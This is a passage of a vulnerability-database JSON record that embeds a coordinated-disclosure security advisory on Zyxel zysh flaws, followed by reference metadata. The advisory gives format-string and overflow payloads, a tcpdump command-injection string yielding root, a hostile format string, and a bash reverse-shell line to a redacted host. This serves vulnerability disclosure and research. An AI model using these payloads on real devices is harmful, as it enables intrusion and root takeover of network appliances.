mac_spec] [-O ctl_cmd] [-o option] [-p port]\n           [-Q query_option] [-R address] [-S ctl_path] [-W host:port]\n           [-w local_tun[:remote_tun]] destination [command]\n\nBased on our analysis, this lack of input filtering is not exploitable to\ninject interesting command-line arguments (e.g. \"-o ProxyCommand=...\"):\n\nRouter\u003e ssh -oProxyCommand@127.0.0.1\ncommand-line: line 0: Bad configuration option: proxycommand@127.0.0.1\nRouter\u003e ssh -oProxyCommand=@127.0.0.1\n% (after \u0027ssh\u0027): Parse error\nretval = -1\nERROR: Parse error/command not found!\n\n--[ 4.4 - Format string bugs in the \"extension\" argument of some commands\n\nSome zysh commands implement a special \"extension\" argument that allows to\nspecify arbitrary command-line arguments to be passed to the invoked OS\ncommand that underlies each functionality:\n\nRouter\u003e ping 127.0.0.1\n;\n\u003ccr\u003e\ncount\nextension\nforever\ninterface\nsize\nsource\n|\n\nFor instance, if we enter the following zysh command:\n\nRouter\u003e ping 127.0.0.1 extension -c 1\n\nThe OS command line below will be executed via the function located at\n0x101295d0, which we dubbed my_invoke():\n\n$ /bin/zysudo.suid /bin/ping 1.1.1.1 -n -c 3  -c 1\n\nAs you can see, the additional arguments we specified after the \"extension\"\nkeyword are appended to the OS command line. \n\nWe identified format string bugs in the following zysh commands:\n\n* \"ping\" and \"ping6\" commands, handled by the function at 0x1000c0a0, which\n  we dubbed do_ping(). \n* \"traceroute\" and \"traceroute6\" commands, handled by the function at\n  0x1000bc58, which we dubbed do_traceroute(). \n* \"nslookup\" and \"nslookup6\" commands, handled by the function at\n  0x1000c718, which we dubbed do_nslookup(). \n\nThe relevant pseudo-code snippets are:\n\nundefined8 do_ping(int argc, char **argv, char *cmd)\n{\n... \n  if (iVar9 != 0) {\n    sVar5 = strlen(acStack880);\n    pcVar1 = ppcStack96[iVar9 + 1];\n    acStack880[sVar5] = \u0027 \u0027;\n    acStack880[sVar5 + 1] = \u0027\\0\u0027;\n    strcpy(acStack880 + sVar5 + 1, pcVar1); /* append extension args */\n  }\n  if (iVar8 == 0) {\n    sprintf(acStack4976, acStack880); /* VULN: format string bug */\n    __pid = fork();\n... \n}\n\nundefined8 do_traceroute(int argc, char **argv, char *cmd)\n{\n... \n  if (iVar10 != 0) {\n    sVar6 = strlen(acStack864);\n    pcVar2 = argv[iVar10 + 1];\n    acStack864[sVar6] = \u0027 \u0027;\n    acStack864[sVar6 + 1] = \u0027\\0\u0027;\n    strcpy(acStack864 + sVar6 + 1, pcVar2); /* append extension args */\n  }\n... \nLAB_1000be10:\n  sprintf(acStack4960,acStack864); /* VULN: format string bug */\n  __pid = fork();\n... \n}\n\nundefined8 do_nslookup(int argc, char **argv)\n{\n... \n  pcVar4 = stpcpy((char *)((int)\u0026uStack832 + sVar3 + 1), \n      *(char **)((int)argv + iVar2));\n  if (iVar8 != 0) {\n    pcVar4[1] = \u0027\\0\u0027;\n    *pcVar4 = \u0027 \u0027;\n    strcpy(pcVar4 + 1, argv[iVar8 + 1]); /* append extension args */\n  }\n... \n  sprintf(acStack4928, (char *)\u0026uStack832); /* VULN: format string bug */\n  __pid = fork();\n... \n}\n\nAs a side note, in the \"nslookup\" and \"nslookup6\" commands there is also a\nbonus stack-based buffer overflow that is not large enough to reach the\nsaved return address. It can be reproduced with the following payload:\n\nRouter\u003e nslookup AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA server AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA extension AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nProgram received signal SIGBUS, Bus error. \n0x1000ba10 in _ftext ()\n(gdb) x/i $pc\n=\u003e 0x1000ba10 \u003c_ftext+17776\u003e: lw  v1,-10184(s0)\n(gdb) i r s0\ns0: 0x4141414141414141\n\nTo reproduce the format string bugs and leak stack memory contents or crash\nzysh, instead, the following payloads can be used:\n\nRouter\u003e # stack memory leak\nRouter\u003e ping 127.0.0.1 extension %x%x%x%x\nping: unknown host 6eb83a7580808080fefeff001145e560\nRouter\u003e # crash\nRouter\u003e ping 127.0.0.1 extension %n%n%n%n\nProgram received signal SIGSEGV, Segmentation fault. \n0x77bf6768 in vfprintf () from /lib32/libc.so.6\n(gdb) bt\n#0  0x77bf6768 in vfprintf () from /lib32/libc.so.6\n#1  0x77c14f44 in vsprintf () from /lib32/libc.so.6\n#2  0x77bfd980 in sprintf () from /lib32/libc.so.6\n#3  0x1000c38c in _ftext () \u003c\u003c do_ping()\n... \nRouter\u003e # crash\nRouter\u003e ping6 ::1 extension %n%n%n%n\nProgram received signal SIGSEGV, Segmentation fault. \n0x77bf6768 in vfprintf () from /lib32/libc.so.6\n\nRouter\u003e # crash\nRouter\u003e traceroute 127.0.0.1 extension %n%n%n%n\nProgram received signal SIGSEGV, Segmentation fault. \n0x77bf6768 in vfprintf () from /lib32/libc.so.6\n(gdb) bt\n#0  0x77bf6768 in vfprintf () from /lib32/libc.so.6\n#1  0x77c14f44 in vsprintf () from /lib32/libc.so.6\n#2  0x77bfd980 in sprintf () from /lib32/libc.so.6\n#3  0x1000be18 in _ftext () \u003c\u003c do_traceroute()\n... \nRouter\u003e # crash\nRouter\u003e traceroute6 ::1 extension %n%n%n%n\nProgram received signal SIGSEGV, Segmentation fault. \n0x77bf6768 in vfprintf () from /lib32/libc.so.6\n\nRouter\u003e # stack memory leak\nRouter\u003e nslookup 127.0.0.1 extension %x%x%x%x\nUsing domain server:\nName: 127.0.0.1\nAddress: 127.0.0.1#53\nAliases:\n\nHost 0bd01390 not found: 3(NXDOMAIN)\nRouter\u003e # crash\nRouter\u003e nslookup 127.0.0.1 extension %n%n%n%n\n\nProgram received signal SIGSEGV, Segmentation fault. \n0x77bf6768 in vfprintf () from /lib32/libc.so.6\n(gdb) bt\n#0  0x77bf6768 in vfprintf () from /lib32/libc.so.6\n#1  0x77c14f44 in vsprintf () from /lib32/libc.so.6\n#2  0x77bfd980 in sprintf () from /lib32/libc.so.6\n#3  0x1000c8c0 in _ftext () \u003c\u003c do_nslookup()\n... \nRouter\u003e # crash\nRouter\u003e nslookup6 ::1 extension %n%n%n%n\nProgram received signal SIGSEGV, Segmentation fault. \n0x77bf6768 in vfprintf () from /lib32/libc.so.6\n\nWe just confirmed that we control the format strings passed as argument to\nthe sprintf() API function in different locations of our target binary. \n\n\n--[ 4.5 - OS command injection in the \"packet-trace\" command\n\nThe OS command injection we identified in the code responsible for handling\nthe \"packet-trace\" command is located in the function at 0x10010258, which\nwe dubbed do_packet-trace(). \n\nThis function builds the command line for the /usr/sbin/tcpdump binary,\nbased on the arguments with which the \"packet-trace\" command is invoked. \nThe available arguments are:\n\nRouter# packet-trace\n;\n\u003ccr\u003e\ndst-host\nduration\nextension-filter\nfile\ninterface\nip-proto\nipv6-proto\nport\nsrc-host\n|\n\nThe \"extension-filter\" argument is particularly interesting, because it\nallows to specify additional arbitrary command-line arguments to be passed\nto tcpdump. For instance, if we enter the following zysh command:\n\nRouter# packet-trace extension-filter -ln -i lo -w -a -W 1 -G 1 -z id\n\nThe OS command line below will be executed via the function located at\n0x101295d0, which we dubbed my_invoke():\n\n$ /usr/sbin/tcpdump -n -i eth0 -ln -i lo -w -a -W 1 -G 1 -z id\n\nAs you can see, we are using a variation of a well-known GTFOBins payload\n[4] that allows us to execute the following OS command (yes, command-line\nswitches that begin with a \u0027-\u0027 are accepted):\n\n$ id -a\n\nRefer to the manual page of tcpdump [5] for further details on how each\ncommand-line switch is interpreted. Seeing it all in action from the Web\nConsole, as an authenticated admin or limited-admin user:\n\nRouter# packet-trace extension-filter -ln -i lo -w -a -W 1 -G 1 -z id\ntcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 65535 bytes\nMaximum file limit reached: 1\n1 packet captured\n2 packets received by filter\n0 packets dropped by kernel\nuid=0(root) gid=0(root) groups=0(root)\n\nWe got arbitrary command execution as root! We just need to find a way to\nexploit it to escape the restricted shell environment. \n\n\n--[ 5 - Exploitation\n\nIn the following sections, we will discuss exploitation of the identified\nvulnerabilities. \n\n\n--[ 5.1 - Buffer overflows\n\nThe zysh binary is in a sorry state when it comes to modern countermeasures\nagainst exploitation of memory corruption bugs:\n\n* No RELRO\n* No stack canary\n* NX disabled\n* No PIE\n* Has RWX segments\n\nThat said, it looks like the buffer overflow vulnerabilities described in\nthis advisory cannot be exploited to achieve arbitrary code execution after\nall, despite our gut feeling... In summary:\n\n* MIPS alphanumeric shellcode is not a thing [6]. \n* A pure ROP chain is also not feasible, at least with the memory mapping\n  used by the device and firmware version combination that we could test. \n\nWe can solve the first problem by storing our shellcode (along with a\ncopious number of NOP-equivalent opcodes) in the value of the TERM\nenvironment variable that gets passed to the remote system via sshd (or\nin.telnetd). At this point, we still need to be able to overwrite the\nstored return address with a value that points to our NOP sled and\nshellcode payload, though. Unfortunately, a partial overwrite would not\nwork in this case, because our target architecture is big endian and\ntherefore we would only be able to overwrite the most significant byte(s),\nachieving nothing of note. On a device and firmware combination with a\nslightly different memory mapping, however, we might be able to pull this\noff and hijack the control flow. \n\nWe are not well-versed in the fine and obscure art of MIPS shellcoding and\nexploitation, so we might have missed something. Feel free to try this\nchallenge on your own!\n\nAs a final note, we also looked into the possibility to exploit the many\nunsafe calls to system() present in the code in order to inject arbitrary\nOS commands. However, we could not slip past the pretty aggressive input\nfilters implemented by zysh. Too bad. \n\n\n--[ 5.2 - Format string bugs\n\nAs discussed earlier, we control the format strings passed as argument to\nthe sprintf() API function in different locations of our target binary. As\na proof of concept, this allowed us to leak stack memory contents and crash\nzysh. \n\nIt is now time to see if we are able to exploit the identified format\nstring bugs to execute arbitrary code and escape the restricted shell\nenvironment... At first glance, this does not look feasible, because once\nagain we are limited in the characters that we can use in our hostile\nbuffer (alphanumeric characters plus some special characters in the 7-bit\nASCII set). \n\nHowever, we devised a workaround: instead of placing our retloc addresses\nat the beginning of the hostile format string as is customary, we can\ninject them in the process memory via the TERM environment variable! The\ndirect parameter access feature of glibc, together with our very own format\nstring exploitation technique for RISC architectures [7], will do the rest. \n\nLong story short, we put together a proof-of-concept exploit [8] that does\nthe following:\n\n* Authenticate and access the target zysh via SSH, injecting our payload\n  (retloc sled + NOP sled + shellcode + padding) via the TERM environment\n  variable. \n\n* Leak a stack address via the format string bug in the \"ping\" command, and\n  use it to calculate the address of our injected shellcode near the bottom\n  of the stack, which changes slightly at each zysh execution. \n\n* Craft another hostile format string to use as an argument to the \"ping\"\n  command and overwrite the .got entry of fork(), which gets called right\n  after the vulnerable sprintf(), with the shellcode address, using a\n  variation of our write-one-byte-at-a-time technique designed for RISC\n  architectures such as MIPS and SPARC. \n\n* Interact with the spawned bash shell!\n\nWe initially thought that Python/Paramiko would be a good language choice\nfor the implementation, but we quickly changed our mind. In the end, we\ndecided to go full old-school and developed our exploit in Tcl/Expect. \nHere it is in action:\n\nraptor@blumenkraft ~ % ./raptor_zysh_fhtagn.exp \u003cREDACTED\u003e admin password\nraptor_zysh_fhtagn.exp - zysh format string PoC exploit\nCopyright (c) 2022 Marco Ivaldi \u003craptor@0xdeadbeef.info\u003e\n\nLeaked stack address:\t0x7fe97170\nShellcode address:\t0x7fe9de40\nBase string length:\t46\nHostile format string:\t%.18u%1801$n%.169u%1801$hn%.150u%1801$hhn%.95u%1802$hhn\n\n*** enjoy your shell! ***\n\nsh-5.1$ uname -snrmp\nLinux USG20-VPN 3.10.87-rt80-Cavium-Octeon mips64 Cavium Octeon III V0.2 FPU V0.0\nsh-5.1$ id\nuid=10007(admin) gid=10000(operator) groups=10000(operator)\n\nOnce we have access to a bash shell on the underlying embedded Linux OS, it\nshould be pretty easy to escalate privileges to root, by leveraging local\nvulnerabilities [1]. \n\nIt should not be too hard to automate/weaponize our exploit to make it work\nagainst other targets. This is left as an exercise. \n\nIn conclusion, format string bugs are a powerful exploit primitive, one of\nour favorites. Once again, they proved to be up to the task even in a\nconstrained scenario such as the one we described. \n\n\n--[ 5.3 - OS command injection\n\nWe managed to find a way to execute arbitrary OS commands by injecting\nspecially-crafted arguments into the tcpdump command line. However,\nexploitation of this vulnerability to escape the restricted shell\nenvironment is not straightforward, due to a number of constraints:\n\n* We can only execute OS commands that do something useful to reach our\n  goal when invoked with exactly one command-line argument. \n\n* Executing \"bash -i\" (or similar commands such as gdb and python) directly\n  does not work, because the shell would die with a \"Bad file descriptor\"\n  error or similar. \n\n* We could upload a shellcode binary via the FTP service (enabled by\n  default on our test device) in the /etc/zyxel/ftp/tmp directory, but to\n  be able to execute it we would need to find a way to turn the file\u0027s\n  executable bit on; we might also be able to abuse some zysh functionality\n  to create an executable file in /etc/zyxel/ftp/tmp that we can later\n  overwrite via FTP or some other means that keep the executable bit on,\n  but we could not find an immediate way to do this. \n\n* We even crafted plain-text traffic to inject arbitrary commands into the\n  pcap output file saved by tcpdump, and tried executing this file as a\n  bash script, but bash would refuse to run it (\"cannot execute binary\n  file\"). \n\n* Alternatively, we could directly upload a shell script via FTP and\n  run it as an argument to bash, but before its execution it would get\n  overwritten by tcpdump; in theory, we could try winning a race by\n  continuously uploading the shell script while tcpdump is executing. \n  Luckily, before we had to implement this, we found a better way. \n\nWe were indeed lucky in finding almost by accident the reliable way to\nexploit this vulnerability that we are going to describe, which involves\nthe use of standard output as a tcpdump output file (\"-w -\" command-line\noption) and some eldritch file descriptor trickery. \n\nIn order to escape the restricted shell environment and execute arbitrary\ncommands as root on the underlying embedded Linux OS, first authenticate to\nthe Web Console at https://\u003cREDACTED\u003e/webconsole/ as either an admin or\nlimited-admin user. Then, run the following commands:\n\nRouter# packet-trace extension-filter -ln -i lo -w - -W 1 -G 1 -z python\ntcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 65535 bytes\n... \nMaximum file limit reached: 1\n5 packets captured\n10 packets received by filter\n0 packets dropped by kernel\nRouter# Python 2.7.14 (default, Sep 23 2021, 23:30:37)\n[GCC 4.7.0] on linux2\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information. \n\u003e\u003e\u003e\n[press enter a few times]\nRouter#\nRouter#\nRouter# packet-trace extension-filter -ln -i lo -w - -W 1 -G 1 -z bash\ntcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 65535 bytes\n... \nMaximum file limit reached: 1\n5 packets captured\n10 packets received by filter\n0 packets dropped by kernel\nRouter# #\n[press enter again]\n  File \"\u003cstdin\u003e\", line 1\n    ^\nSyntaxError: invalid syntax\n\u003e\u003e\u003e import os\n\u003e\u003e\u003e os.system(\"bash -i \u003e\u0026 /dev/tcp/\u003cREDACTED\u003e/23234 0\u003e\u00261\")\n\nThis will get you a privileged reverse shell:\n\nraptor@gollum:~$ nc -nvlp 23234\nListening on 0.0.0.0 23234\nConnection received on \u003cREDACTED\u003e 54330\nbash: cannot set terminal process group (25792): Inappropriate ioctl for device\nbash: no job control in this shell\nbash-5.1# uname -a\nuname -a\nLinux USG20-VPN 3.10.87-rt80-Cavium-Octeon #2 Fri Sep 24 00:34:21 CST 2021 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7010p1.2-800-AAP) GNU/Linux\nbash-5.1# id\nid\nuid=0(root) gid=10000(operator) groups=0(root),10000(operator)\nbash-5.1#\n\nOf course, you can choose to execute your favorite Python code instead. \n\nApparently, we managed to find a way to connect the standard input of the\nWeb Console to the standard input of the python process we spawned with the\nfirst command, in a mind-bending exploit. To preserve our sanity, we have\nnot thoroughly investigated how this is happening... but it works! And it\nis very reliable. \n\nOn our test device, this exploitation vector only works from the Web\nConsole, as an authenticated admin or limited-admin user. As an added\nbenefit, as we have seen, the Web Console spawns zysh as root. \n\nWe do not exclude other ways to exploit the described vulnerability,\nperhaps by creating or overwriting critical system files. It could also be\neasily abused to clobber arbitrary files and cause a Denial of Service\ncondition on vulnerable devices, although we are not going to provide a\nproof-of-concept exploit for this (we are pretty sure you can easily figure\nit out on your own anyway). \n\n\n--[ 6 - Affected products\n\nAccording to Zyxel, zysh is present on a wide range of products, including\ntheir security appliances such as FLEX, ATP, USG, VPN, and ZyWALL [9], AP\ncontrollers and APs. \n\nOur audit was conducted exclusively on a Zyxel USG20-VPN test device with\nFirmware 5.10. However, other products and firmware versions have been\nconfirmed by Zyxel to be affected by the same vulnerabilities. \n\n\n--[ 7 - Remediation\n\nDuring the whole coordinated disclosure process, Zyxel was very responsive. \nWorking with them has been a pleasure and we would like to publicly\nacknowledge it, as unfortunately this is not always the case with every\nvendor. \n\nThe memory corruption bugs were collectively assigned CVE-2022-26531, while\nthe OS command injection vulnerability was assigned CVE-2022-26532. Please refer\nto their advisory for patching information. \n\nWe have not checked the effectiveness of the fixes. \n\n\n--[ 8 - Disclosure timeline\n\n2022-02-25: Zyxel was notified via \u003csecurity@zyxel.com.tw\u003e. \n2022-02-25: Zyxel acknowledged our vulnerability reports. \n2022-03-17: Zyxel assigned CVE-2022-26531 and CVE-2022-26532 to the\n\t    reported issues and informed us of their intention to publish\n            their security advisory on 2022-05-24. \n2022-03-18: As a token of their appreciation, Zyxel gave us a certificate\n            of recognition. \n2022-05-24: Zyxel published their security advisory, following our\n            coordinated disclosure timeline. \n2022-06-07: HN Security published this advisory with full details. \n\n\n--[ 9 - References\n\n[0] https://www.zyxel.com/\n[1] https://security.humanativaspa.it/tag/zyxel/\n[2] https://www.dropbox.com/s/kvm5xwxqfrwge0t/USG20-VPN_5.10.zip?dl=1\n[3] https://en.wikipedia.org/wiki/MIPS_architecture\n[4] https://gtfobins.github.io/gtfobins/tcpdump/\n[5] https://www.tcpdump.org/manpages/tcpdump.1.html\n[6] https://twitter.com/pulsoid/status/1368146791473045504\n[7] http://phrack.org/issues/70/13.html#article\n[8] https://github.com/0xdea/exploits/blob/master/zyxel/raptor_zysh_fhtagn.exp\n[9] https://support.zyxel.eu/hc/en-us/articles/360013941859\n\n\nCopyright (c) 2022 Marco Ivaldi and Humanativa Group. All rights reserved",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-26531"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-26531"
          },
          {
            "db": "PACKETSTORM",
            "id": "167464"
          }
        ],
        "trust": 1.08
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "PACKETSTORM",
            "id": "167464",
            "trust": 1.8
          },
          {
            "db": "NVD",
            "id": "CVE-2022-26531",
            "trust": 1.8
          },
          {
            "db": "PACKETSTORM",
            "id": "177036",
            "trust": 1.1
          },
          {
            "db": "CS-HELP",
            "id": "SB2022052406",
            "trust": 0.6
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2022060063",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-4000",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-26531",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-26531"
          },
          {
            "db": "PACKETSTORM",
            "id": "167464"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-4000"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-26531"
          }
        ]
      },
      "id": "VAR-202205-1790",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.35069445
      },
      "last_update_date": "2024-02-13T01:28:58.545000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Zyxel USG/ZyWALL Enter the fix for the verification error vulnerability",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=195231"
          },
          {
            "title": "vulnerability reports",
            "trust": 0.1,
            "url": "https://github.com/hnsecurity/vulns "
          },
          {
            "title": "advisories",
            "trust": 0.1,
            "url": "https://github.com/0xdea/advisories "
          },
          {
            "title": "exploits",
            "trust": 0.1,
            "url": "https://github.com/0xdea/exploits "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-26531"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-4000"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-20",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-26531"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.3,
            "url": "http://packetstormsecurity.com/files/167464/zyxel-buffer-overflow-format-string-command-injection.html"
          },
          {
            "trust": 1.8,
            "url": "https://www.zyxel.com/support/multiple-vulnerabilities-of-firewalls-ap-controllers-and-aps.shtml"
          },
          {
            "trust": 1.7,
            "url": "http://seclists.org/fulldisclosure/2022/jun/15"
          },
          {
            "trust": 1.2,
            "url": "http://packetstormsecurity.com/files/177036/zyxel-zysh-format-string-proof-of-concept.html"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2022052406"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2022-26531/"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2022060063"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/20.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/hnsecurity/vulns"
          },
          {
            "trust": 0.1,
            "url": "https://security.humanativaspa.it/tag/zyxel/"
          },
          {
            "trust": 0.1,
            "url": "https://www.zyxel.com/"
          },
          {
            "trust": 0.1,
            "url": "https://www.dropbox.com/s/kvm5xwxqfrwge0t/usg20-vpn_5.10.zip?dl=1"
          },
          {
            "trust": 0.1,
            "url": "https://www.tcpdump.org/manpages/tcpdump.1.html"
          },
          {
            "trust": 0.1,
            "url": "https://support.zyxel.eu/hc/en-us/articles/360013941859"
          },
          {
            "trust": 0.1,
            "url": "http://phrack.org/issues/70/13.html#article"
          },
          {
            "trust": 0.1,
            "url": "https://gtfobins.github.io/gtfobins/tcpdump/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-26531"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-26532"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/hnsecurity/vulns/blob/main/hns-2022-02-zyxel-zysh.txt"
          },
          {
            "trust": 0.1,
            "url": "https://twitter.com/pulsoid/status/1368146791473045504"
          },
          {
            "trust": 0.1,
            "url": "https://security.humanativaspa.it/"
          },
          {
            "trust": 0.1,
            "url": "https://\u003credacted\u003e/webconsole/"
          },
          {
            "trust": 0.1,
            "url": "https://en.wikipedia.org/wiki/mips_architecture"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/0xdea/exploits/blob/master/zyxel/raptor_zysh_fhtagn.exp"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-26531"
          },
          {
            "db": "PACKETSTORM",
            "id": "167464"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-4000"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-26531"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2022-26531"
          },
          {
            "db": "PACKETSTORM",
            "id": "167464"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-4000"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-26531"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-05-24T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-26531"
          },
          {
            "date": "2022-06-19T15:26:57",
            "db": "PACKETSTORM",
            "id": "167464"
          },
          {
            "date": "2022-05-24T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202205-4000"
          },
          {
            "date": "2022-05-24T06:15:09.297000",
            "db": "NVD",
            "id": "CVE-2022-26531"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2024-02-09T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-26531"
          },
          {
            "date": "2022-06-21T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202205-4000"
          },
          {
            "date": "2024-02-09T18:15:07.930000",
            "db": "NVD",
            "id": "CVE-2022-26531"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "local",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-4000"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Zyxel USG/ZyWALL Input validation error vulnerability",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-4000"
          }
        ],
        "trust": 0.6
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "input validation error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-4000"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202304-1906

    Vulnerability from variot - Updated: 2024-02-03 22:35

    The cross-site scripting (XSS) vulnerability in Zyxel ATP series firmware versions 4.32 through 5.35, USG FLEX series firmware versions 4.50 through 5.35, USG FLEX 50(W) firmware versions 4.16 through 5.35, USG20(W)-VPN firmware versions 4.16 through 5.35, and VPN series firmware versions 4.30 through 5.35, which could allow an authenticated attacker with administrator privileges to store malicious scripts in a vulnerable device. A successful XSS attack could then result in the stored malicious scripts being executed when the user visits the Logs page of the GUI on the device. ATP200 firmware, ATP100 firmware, ATP700 firmware etc. ZyXEL A cross-site scripting vulnerability exists in the product.Information may be obtained and information may be tampered with

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
